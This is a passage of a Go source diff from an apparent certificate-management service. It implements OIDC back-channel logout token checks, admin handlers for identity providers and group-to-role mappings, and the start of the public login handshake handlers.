||||||
|
return "", "", "", "", 0, fmt.Errorf("iat is in the future beyond max-age %s", maxAge)
|
||||||
|
}
|
||||||
|
if now.Sub(iatTime) > maxAge {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("iat is stale (age %s > max-age %s)", now.Sub(iatTime), maxAge)
|
||||||
|
}
|
||||||
|
if claims.Jti == "" {
|
||||||
|
return "", "", "", "", 0, errors.New("missing jti claim")
|
||||||
|
}
|
||||||
|
if claims.Events == nil {
|
||||||
|
return "", "", "", "", 0, errors.New("missing events claim")
|
||||||
|
}
|
||||||
|
if _, ok := claims.Events["http://schemas.openid.net/event/backchannel-logout"]; !ok {
|
||||||
|
return "", "", "", "", 0, errors.New("events claim missing back-channel-logout URI")
|
||||||
|
}
|
||||||
|
if claims.Nonce != "" {
|
||||||
|
// Spec §2.4: nonce MUST NOT be present.
|
||||||
|
return "", "", "", "", 0, errors.New("nonce claim must be absent in logout_token")
|
||||||
|
}
|
||||||
|
if claims.Sub == "" && claims.Sid == "" {
|
||||||
|
return "", "", "", "", 0, errors.New("logout_token must carry sub or sid")
|
||||||
|
}
|
||||||
|
return claims.Iss, claims.Sub, claims.Sid, claims.Jti, claims.Iat, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// peekIssuer base64-decodes the JWT payload (segment 1 after the `.`)
|
||||||
|
// and pulls the `iss` claim out without verifying the signature. Used
|
||||||
|
// to find the matching provider before we know which JWKS to use.
|
||||||
|
// peekIssuer extracts the `iss` claim from an unsigned JWT payload —
|
||||||
|
// used by the BCL handler to route the logout_token to the right
|
||||||
|
// provider for verification.
|
||||||
|
//
|
||||||
|
// Audit 2026-05-10 Nit-3 — peekIssuer is INTENTIONALLY unsigned-permissive.
|
||||||
|
// The returned issuer is used ONLY to select the verifier; the full
|
||||||
|
// signature + claim verification happens in DefaultBCLVerifier.Verify
|
||||||
|
// (which re-checks the `iss` claim against the matched provider's
|
||||||
|
// IssuerURL after JWS signature validation). Callers MUST NOT trust
|
||||||
|
// peekIssuer output for any access-control decision before the verify
|
||||||
|
// step completes; the pin is encoded in the BCL handler's call shape
|
||||||
|
// (peek → match provider → verify-against-provider → consume).
|
||||||
|
func peekIssuer(jwt string) (string, error) {
|
||||||
|
parts := strings.Split(jwt, ".")
|
||||||
|
if len(parts) != 3 {
|
||||||
|
return "", errors.New("expected 3 JWT segments")
|
||||||
|
}
|
||||||
|
payload, err := base64.RawURLEncoding.DecodeString(parts[1])
|
||||||
|
if err != nil {
|
||||||
|
return "", fmt.Errorf("payload base64: %w", err)
|
||||||
|
}
|
||||||
|
var c struct {
|
||||||
|
Iss string `json:"iss"`
|
||||||
|
}
|
||||||
|
if jerr := json.Unmarshal(payload, &c); jerr != nil {
|
||||||
|
return "", fmt.Errorf("payload json: %w", jerr)
|
||||||
|
}
|
||||||
|
if c.Iss == "" {
|
||||||
|
return "", errors.New("missing iss claim in payload")
|
||||||
|
}
|
||||||
|
return c.Iss, nil
|
||||||
|
}
|
||||||
@@ -0,0 +1,469 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"encoding/json"
|
||||||
|
"errors"
|
||||||
|
"net/http"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
oidcsvc "github.com/certctl-io/certctl/internal/auth/oidc"
|
||||||
|
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 11 (2026-05-14): extracted from
|
||||||
|
// internal/api/handler/auth_session_oidc.go via the Option B
|
||||||
|
// sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds Section 3 of the original three-section layout:
|
||||||
|
// OIDC PROVIDER + GROUP-MAPPING CRUD (RBAC-gated). Eight
|
||||||
|
// endpoints across two related resources:
|
||||||
|
//
|
||||||
|
// GET /api/v1/auth/oidc/providers -> auth.oidc.list
|
||||||
|
// POST /api/v1/auth/oidc/providers -> auth.oidc.create
|
||||||
|
// PUT /api/v1/auth/oidc/providers/{id} -> auth.oidc.edit
|
||||||
|
// DELETE /api/v1/auth/oidc/providers/{id} -> auth.oidc.delete
|
||||||
|
// POST /api/v1/auth/oidc/providers/{id}/test -> auth.oidc.edit
|
||||||
|
// POST /api/v1/auth/oidc/providers/{id}/refresh -> auth.oidc.edit
|
||||||
|
// GET /api/v1/auth/oidc/group-mappings -> auth.oidc.list
|
||||||
|
// POST /api/v1/auth/oidc/group-mappings -> auth.oidc.edit
|
||||||
|
// DELETE /api/v1/auth/oidc/group-mappings/{id} -> auth.oidc.edit
|
||||||
|
//
|
||||||
|
// The four request/response projection types (oidcProviderRequest,
|
||||||
|
// oidcProviderResponse, groupMappingRequest, groupMappingResponse)
|
||||||
|
// move with their handler callers. The encryptClientSecret +
|
||||||
|
// recordAudit + randomB64URLForHandler + defaultIfBlank +
|
||||||
|
// defaultIntIfZero helpers stay in auth_session_oidc.go — they're
|
||||||
|
// also consumed elsewhere (recordAudit is used by every section)
|
||||||
|
// or are generic utilities that don't have a single owner.
|
||||||
|
//
|
||||||
|
// NOTE: the audit's verb-based prescription (login / callback /
|
||||||
|
// refresh / logout / backchannel) named "refresh" as a separate
|
||||||
|
// sibling file. The RefreshProvider handler here is the only
|
||||||
|
// "refresh" in this file, but operationally it's an ADMIN
|
||||||
|
// operation on a provider's signing-key cache, not a session
|
||||||
|
// refresh. Sprint 11 keeps it grouped with the rest of the
|
||||||
|
// provider CRUD where it belongs by call-graph + permission scope
|
||||||
|
// (auth.oidc.edit, the same RBAC permission as Update/Delete).
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// 3. OIDC provider + group-mapping CRUD.
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
type oidcProviderResponse struct {
|
||||||
|
ID string `json:"id"`
|
||||||
|
TenantID string `json:"tenant_id"`
|
||||||
|
Name string `json:"name"`
|
||||||
|
IssuerURL string `json:"issuer_url"`
|
||||||
|
ClientID string `json:"client_id"`
|
||||||
|
RedirectURI string `json:"redirect_uri"`
|
||||||
|
GroupsClaimPath string `json:"groups_claim_path"`
|
||||||
|
GroupsClaimFormat string `json:"groups_claim_format"`
|
||||||
|
FetchUserinfo bool `json:"fetch_userinfo"`
|
||||||
|
Scopes []string `json:"scopes"`
|
||||||
|
AllowedEmailDomains []string `json:"allowed_email_domains"`
|
||||||
|
IATWindowSeconds int `json:"iat_window_seconds"`
|
||||||
|
JWKSCacheTTLSeconds int `json:"jwks_cache_ttl_seconds"`
|
||||||
|
CreatedAt string `json:"created_at"`
|
||||||
|
UpdatedAt string `json:"updated_at"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func providerToResponse(p *oidcdomain.OIDCProvider) oidcProviderResponse {
|
||||||
|
return oidcProviderResponse{
|
||||||
|
ID: p.ID, TenantID: p.TenantID, Name: p.Name,
|
||||||
|
IssuerURL: p.IssuerURL, ClientID: p.ClientID, RedirectURI: p.RedirectURI,
|
||||||
|
GroupsClaimPath: p.GroupsClaimPath, GroupsClaimFormat: p.GroupsClaimFormat,
|
||||||
|
FetchUserinfo: p.FetchUserinfo, Scopes: p.Scopes, AllowedEmailDomains: p.AllowedEmailDomains,
|
||||||
|
IATWindowSeconds: p.IATWindowSeconds, JWKSCacheTTLSeconds: p.JWKSCacheTTLSeconds,
|
||||||
|
CreatedAt: p.CreatedAt.UTC().Format(time.RFC3339),
|
||||||
|
UpdatedAt: p.UpdatedAt.UTC().Format(time.RFC3339),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
type oidcProviderRequest struct {
|
||||||
|
Name string `json:"name"`
|
||||||
|
IssuerURL string `json:"issuer_url"`
|
||||||
|
ClientID string `json:"client_id"`
|
||||||
|
ClientSecret string `json:"client_secret"` // plaintext on the wire ONLY at create/update; encrypted at rest
|
||||||
|
RedirectURI string `json:"redirect_uri"`
|
||||||
|
GroupsClaimPath string `json:"groups_claim_path"`
|
||||||
|
GroupsClaimFormat string `json:"groups_claim_format"`
|
||||||
|
FetchUserinfo bool `json:"fetch_userinfo"`
|
||||||
|
Scopes []string `json:"scopes"`
|
||||||
|
AllowedEmailDomains []string `json:"allowed_email_domains"`
|
||||||
|
IATWindowSeconds int `json:"iat_window_seconds"`
|
||||||
|
JWKSCacheTTLSeconds int `json:"jwks_cache_ttl_seconds"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListProviders handles GET /api/v1/auth/oidc/providers.
|
||||||
|
func (h *AuthSessionOIDCHandler) ListProviders(w http.ResponseWriter, r *http.Request) {
|
||||||
|
if _, err := callerFromRequest(r); err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
provs, err := h.providerRepo.List(r.Context(), h.tenantID)
|
||||||
|
if err != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not list providers")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
out := make([]oidcProviderResponse, 0, len(provs))
|
||||||
|
for _, p := range provs {
|
||||||
|
out = append(out, providerToResponse(p))
|
||||||
|
}
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"providers": out})
|
||||||
|
}
|
||||||
|
|
||||||
|
// CreateProvider handles POST /api/v1/auth/oidc/providers.
|
||||||
|
func (h *AuthSessionOIDCHandler) CreateProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var req oidcProviderRequest
|
||||||
|
if derr := json.NewDecoder(r.Body).Decode(&req); derr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "invalid JSON body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if strings.TrimSpace(req.ClientSecret) == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "client_secret is required")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
encrypted, eerr := h.encryptClientSecret([]byte(req.ClientSecret))
|
||||||
|
if eerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not encrypt client secret")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
prov := &oidcdomain.OIDCProvider{
|
||||||
|
ID: "op-" + randomB64URLForHandler(16),
|
||||||
|
TenantID: h.tenantID,
|
||||||
|
Name: req.Name,
|
||||||
|
IssuerURL: req.IssuerURL,
|
||||||
|
ClientID: req.ClientID,
|
||||||
|
ClientSecretEncrypted: encrypted,
|
||||||
|
RedirectURI: req.RedirectURI,
|
||||||
|
GroupsClaimPath: defaultIfBlank(req.GroupsClaimPath, oidcdomain.DefaultGroupsClaimPath),
|
||||||
|
GroupsClaimFormat: defaultIfBlank(req.GroupsClaimFormat, oidcdomain.GroupsClaimFormatStringArray),
|
||||||
|
FetchUserinfo: req.FetchUserinfo,
|
||||||
|
Scopes: req.Scopes,
|
||||||
|
AllowedEmailDomains: req.AllowedEmailDomains,
|
||||||
|
IATWindowSeconds: defaultIntIfZero(req.IATWindowSeconds, oidcdomain.DefaultIATWindowSeconds),
|
||||||
|
JWKSCacheTTLSeconds: defaultIntIfZero(req.JWKSCacheTTLSeconds, oidcdomain.DefaultJWKSCacheTTLSeconds),
|
||||||
|
}
|
||||||
|
if verr := prov.Validate(); verr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, verr.Error())
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if cerr := h.providerRepo.Create(r.Context(), prov); cerr != nil {
|
||||||
|
if errors.Is(cerr, repository.ErrOIDCProviderDuplicateName) {
|
||||||
|
Error(w, http.StatusConflict, "provider name already exists")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not create provider")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_created", caller.ActorID, caller.ActorType, prov.ID,
|
||||||
|
map[string]interface{}{"provider_id": prov.ID, "name": prov.Name, "issuer_url": prov.IssuerURL})
|
||||||
|
writeJSON(w, http.StatusCreated, providerToResponse(prov))
|
||||||
|
}
|
||||||
|
|
||||||
|
// UpdateProvider handles PUT /api/v1/auth/oidc/providers/{id}.
|
||||||
|
func (h *AuthSessionOIDCHandler) UpdateProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
id := r.PathValue("id")
|
||||||
|
if id == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing provider id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
existing, gerr := h.providerRepo.Get(r.Context(), id)
|
||||||
|
if gerr != nil {
|
||||||
|
if errors.Is(gerr, repository.ErrOIDCProviderNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "provider not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not load provider")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var req oidcProviderRequest
|
||||||
|
if derr := json.NewDecoder(r.Body).Decode(&req); derr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "invalid JSON body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Mutable fields only (id / tenant_id / created_at preserved).
|
||||||
|
existing.Name = req.Name
|
||||||
|
existing.IssuerURL = req.IssuerURL
|
||||||
|
existing.ClientID = req.ClientID
|
||||||
|
existing.RedirectURI = req.RedirectURI
|
||||||
|
existing.GroupsClaimPath = defaultIfBlank(req.GroupsClaimPath, existing.GroupsClaimPath)
|
||||||
|
existing.GroupsClaimFormat = defaultIfBlank(req.GroupsClaimFormat, existing.GroupsClaimFormat)
|
||||||
|
existing.FetchUserinfo = req.FetchUserinfo
|
||||||
|
existing.Scopes = req.Scopes
|
||||||
|
existing.AllowedEmailDomains = req.AllowedEmailDomains
|
||||||
|
if req.IATWindowSeconds != 0 {
|
||||||
|
existing.IATWindowSeconds = req.IATWindowSeconds
|
||||||
|
}
|
||||||
|
if req.JWKSCacheTTLSeconds != 0 {
|
||||||
|
existing.JWKSCacheTTLSeconds = req.JWKSCacheTTLSeconds
|
||||||
|
}
|
||||||
|
// Re-encrypt client_secret only if a new one is supplied; empty
|
||||||
|
// preserves the existing ciphertext.
|
||||||
|
if strings.TrimSpace(req.ClientSecret) != "" {
|
||||||
|
encrypted, eerr := h.encryptClientSecret([]byte(req.ClientSecret))
|
||||||
|
if eerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not encrypt client secret")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
existing.ClientSecretEncrypted = encrypted
|
||||||
|
}
|
||||||
|
if verr := existing.Validate(); verr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, verr.Error())
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if uerr := h.providerRepo.Update(r.Context(), existing); uerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not update provider")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_updated", caller.ActorID, caller.ActorType, existing.ID,
|
||||||
|
map[string]interface{}{"provider_id": existing.ID, "name": existing.Name})
|
||||||
|
writeJSON(w, http.StatusOK, providerToResponse(existing))
|
||||||
|
}
|
||||||
|
|
||||||
|
// DeleteProvider handles DELETE /api/v1/auth/oidc/providers/{id}.
|
||||||
|
// Refused when at least one user has authenticated via this provider.
|
||||||
|
func (h *AuthSessionOIDCHandler) DeleteProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
id := r.PathValue("id")
|
||||||
|
if id == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing provider id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if derr := h.providerRepo.Delete(r.Context(), id); derr != nil {
|
||||||
|
switch {
|
||||||
|
case errors.Is(derr, repository.ErrOIDCProviderNotFound):
|
||||||
|
Error(w, http.StatusNotFound, "provider not found")
|
||||||
|
case errors.Is(derr, repository.ErrOIDCProviderInUse):
|
||||||
|
Error(w, http.StatusConflict, "provider has authenticated users; revoke all sessions before delete")
|
||||||
|
default:
|
||||||
|
Error(w, http.StatusInternalServerError, "could not delete provider")
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_deleted", caller.ActorID, caller.ActorType, id,
|
||||||
|
map[string]interface{}{"provider_id": id})
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestProvider handles POST /api/v1/auth/oidc/test.
|
||||||
|
//
|
||||||
|
// Audit 2026-05-10 MED-5 closure. Dry-run validator for an OIDC
|
||||||
|
// provider config: runs OIDC discovery, the alg-downgrade defense,
|
||||||
|
// the RFC 9207 iss-parameter detection, and a JWKS fetch — without
|
||||||
|
// persisting anything. Body: `{issuer_url, client_id, scopes}`
|
||||||
|
// (client_secret accepted but ignored — discovery + JWKS don't
|
||||||
|
// require it). Response: TestDiscoveryResult; HTTP 200 even when
|
||||||
|
// individual checks fail (the response Errors field carries them so
|
||||||
|
// the GUI can render per-check status rows).
|
||||||
|
//
|
||||||
|
// Permission gate: `auth.oidc.create` (the operator is dry-running a
|
||||||
|
// provider they're about to create; the lookup endpoints have their
|
||||||
|
// own .list gate so this can't be used as a roundabout reconnaissance
|
||||||
|
// vector beyond what those already permit).
|
||||||
|
func (h *AuthSessionOIDCHandler) TestProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var req struct {
|
||||||
|
IssuerURL string `json:"issuer_url"`
|
||||||
|
ClientID string `json:"client_id"`
|
||||||
|
ClientSecret string `json:"client_secret"`
|
||||||
|
Scopes []string `json:"scopes"`
|
||||||
|
}
|
||||||
|
if derr := json.NewDecoder(r.Body).Decode(&req); derr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "invalid JSON body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if strings.TrimSpace(req.IssuerURL) == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "issuer_url is required")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Type-assert to the concrete service so we can reach the
|
||||||
|
// TestDiscovery method. The OIDCAuthHandshaker interface is
|
||||||
|
// intentionally narrow; rather than widening it (which would force
|
||||||
|
// every test stub to implement TestDiscovery) we accept the
|
||||||
|
// concrete reference for this single endpoint. Production code
|
||||||
|
// always supplies *oidcsvc.Service.
|
||||||
|
type discoveryTester interface {
|
||||||
|
TestDiscovery(ctx context.Context, issuerURL string) (*oidcsvc.TestDiscoveryResult, error)
|
||||||
|
}
|
||||||
|
tester, ok := h.oidcSvc.(discoveryTester)
|
||||||
|
if !ok {
|
||||||
|
Error(w, http.StatusInternalServerError, "OIDC service does not support discovery test")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
res, terr := tester.TestDiscovery(r.Context(), strings.TrimSpace(req.IssuerURL))
|
||||||
|
if terr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "discovery test execution failed")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_tested", caller.ActorID, caller.ActorType, "",
|
||||||
|
map[string]interface{}{
|
||||||
|
"issuer_url": req.IssuerURL,
|
||||||
|
"discovery_succeeded": res.DiscoverySucceeded,
|
||||||
|
"jwks_reachable": res.JWKSReachable,
|
||||||
|
"iss_param_supported": res.IssParamSupported,
|
||||||
|
"error_count": len(res.Errors),
|
||||||
|
})
|
||||||
|
writeJSON(w, http.StatusOK, res)
|
||||||
|
}
|
||||||
|
|
||||||
|
// RefreshProvider handles POST /api/v1/auth/oidc/providers/{id}/refresh.
|
||||||
|
// Forces re-fetch of the IdP discovery doc + JWKS, re-runs the IdP
|
||||||
|
// downgrade-attack defense.
|
||||||
|
func (h *AuthSessionOIDCHandler) RefreshProvider(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
id := r.PathValue("id")
|
||||||
|
if id == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing provider id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if rerr := h.oidcSvc.RefreshKeys(r.Context(), id); rerr != nil {
|
||||||
|
if errors.Is(rerr, repository.ErrOIDCProviderNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "provider not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusBadRequest, "refresh failed: "+rerr.Error())
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_provider_refreshed", caller.ActorID, caller.ActorType, id,
|
||||||
|
map[string]interface{}{"provider_id": id})
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"refreshed": true})
|
||||||
|
}
|
||||||
|
|
||||||
|
type groupMappingResponse struct {
|
||||||
|
ID string `json:"id"`
|
||||||
|
ProviderID string `json:"provider_id"`
|
||||||
|
GroupName string `json:"group_name"`
|
||||||
|
RoleID string `json:"role_id"`
|
||||||
|
TenantID string `json:"tenant_id"`
|
||||||
|
CreatedAt string `json:"created_at"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func mappingToResponse(m *oidcdomain.GroupRoleMapping) groupMappingResponse {
|
||||||
|
return groupMappingResponse{
|
||||||
|
ID: m.ID, ProviderID: m.ProviderID, GroupName: m.GroupName,
|
||||||
|
RoleID: m.RoleID, TenantID: m.TenantID,
|
||||||
|
CreatedAt: m.CreatedAt.UTC().Format(time.RFC3339),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
type groupMappingRequest struct {
|
||||||
|
ProviderID string `json:"provider_id"`
|
||||||
|
GroupName string `json:"group_name"`
|
||||||
|
RoleID string `json:"role_id"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListGroupMappings handles GET /api/v1/auth/oidc/group-mappings?provider_id=<id>.
|
||||||
|
func (h *AuthSessionOIDCHandler) ListGroupMappings(w http.ResponseWriter, r *http.Request) {
|
||||||
|
if _, err := callerFromRequest(r); err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
providerID := strings.TrimSpace(r.URL.Query().Get("provider_id"))
|
||||||
|
if providerID == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing required query parameter `provider_id`")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
mappings, lerr := h.mappingRepo.ListByProvider(r.Context(), providerID)
|
||||||
|
if lerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not list mappings")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
out := make([]groupMappingResponse, 0, len(mappings))
|
||||||
|
for _, m := range mappings {
|
||||||
|
out = append(out, mappingToResponse(m))
|
||||||
|
}
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"mappings": out})
|
||||||
|
}
|
||||||
|
|
||||||
|
// AddGroupMapping handles POST /api/v1/auth/oidc/group-mappings.
|
||||||
|
func (h *AuthSessionOIDCHandler) AddGroupMapping(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var req groupMappingRequest
|
||||||
|
if derr := json.NewDecoder(r.Body).Decode(&req); derr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "invalid JSON body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
mapping := &oidcdomain.GroupRoleMapping{
|
||||||
|
ID: "grm-" + randomB64URLForHandler(16),
|
||||||
|
ProviderID: req.ProviderID,
|
||||||
|
GroupName: req.GroupName,
|
||||||
|
RoleID: req.RoleID,
|
||||||
|
TenantID: h.tenantID,
|
||||||
|
}
|
||||||
|
if verr := mapping.Validate(); verr != nil {
|
||||||
|
Error(w, http.StatusBadRequest, verr.Error())
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if aerr := h.mappingRepo.Add(r.Context(), mapping); aerr != nil {
|
||||||
|
if errors.Is(aerr, repository.ErrGroupRoleMappingDuplicate) {
|
||||||
|
Error(w, http.StatusConflict, "mapping already exists")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not add mapping")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.group_mapping_added", caller.ActorID, caller.ActorType, mapping.ID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"mapping_id": mapping.ID, "provider_id": mapping.ProviderID,
|
||||||
|
"group_name": mapping.GroupName, "role_id": mapping.RoleID,
|
||||||
|
})
|
||||||
|
writeJSON(w, http.StatusCreated, mappingToResponse(mapping))
|
||||||
|
}
|
||||||
|
|
||||||
|
// RemoveGroupMapping handles DELETE /api/v1/auth/oidc/group-mappings/{id}.
|
||||||
|
func (h *AuthSessionOIDCHandler) RemoveGroupMapping(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
id := r.PathValue("id")
|
||||||
|
if id == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing mapping id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if rerr := h.mappingRepo.Remove(r.Context(), id); rerr != nil {
|
||||||
|
if errors.Is(rerr, repository.ErrGroupRoleMappingNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "mapping not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not remove mapping")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.group_mapping_removed", caller.ActorID, caller.ActorType, id,
|
||||||
|
map[string]interface{}{"mapping_id": id})
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
}
|
||||||
@@ -0,0 +1,390 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"errors"
|
||||||
|
"net/http"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
||||||
|
sessionsvc "github.com/certctl-io/certctl/internal/auth/session"
|
||||||
|
sessiondomain "github.com/certctl-io/certctl/internal/auth/session/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 11 (2026-05-14): extracted from
|
||||||
|
// internal/api/handler/auth_session_oidc.go via the Option B
|
||||||
|
// sibling-file pattern. Package stays `handler`; every external
|
||||||
|
// caller of `handler.AuthSessionOIDCHandler.{LoginInitiate,
|
||||||
|
// LoginCallback, BackChannelLogout, Logout}` resolves the same
|
||||||
|
// way — pure mechanical relocation. The router wiring in
|
||||||
|
// internal/api/router/router.go is unaffected.
|
||||||
|
//
|
||||||
|
// This file holds Section 1 of the original file's three-section
|
||||||
|
// layout (per its own package doc-comment): the PUBLIC OIDC
|
||||||
|
// HANDSHAKE handlers. These four endpoints are auth-exempt — they
|
||||||
|
// run before the caller has a certctl-issued credential:
|
||||||
|
//
|
||||||
|
// GET /auth/oidc/login?provider=<id> -> 302 to IdP
|
||||||
|
// GET /auth/oidc/callback?code=...&state=... -> consume + mint
|
||||||
|
// POST /auth/oidc/back-channel-logout -> IdP-initiated
|
||||||
|
// POST /auth/logout -> revoke caller's
|
||||||
|
//
|
||||||
|
// Helpers (h.clearPreLoginCookie / h.clearSessionCookies /
|
||||||
|
// h.recordAudit / clientIPFromRequest / classifyOIDCFailure) stay
|
||||||
|
// in auth_session_oidc.go alongside the AuthSessionOIDCHandler
|
||||||
|
// struct + constructor — same-package resolution makes the calls
|
||||||
|
// reach across the file boundary at zero compile-time cost.
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// 1. Public OIDC handshake handlers.
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
// LoginInitiate handles GET /auth/oidc/login?provider=<id>.
|
||||||
|
//
|
||||||
|
// Generates state + nonce + PKCE-S256 verifier (in OIDCService),
|
||||||
|
// persists the pre-login row, sets the certctl_oidc_pending cookie,
|
||||||
|
// 302-redirects to the IdP authorization URL.
|
||||||
|
func (h *AuthSessionOIDCHandler) LoginInitiate(w http.ResponseWriter, r *http.Request) {
|
||||||
|
providerID := strings.TrimSpace(r.URL.Query().Get("provider"))
|
||||||
|
if providerID == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing required query parameter `provider`")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Audit 2026-05-10 MED-16 — capture clientIP + UA at /auth/oidc/login
|
||||||
|
// so HandleCallback can reject a stolen pre-login cookie replayed
|
||||||
|
// from a different browser/source. clientIPFromRequest already
|
||||||
|
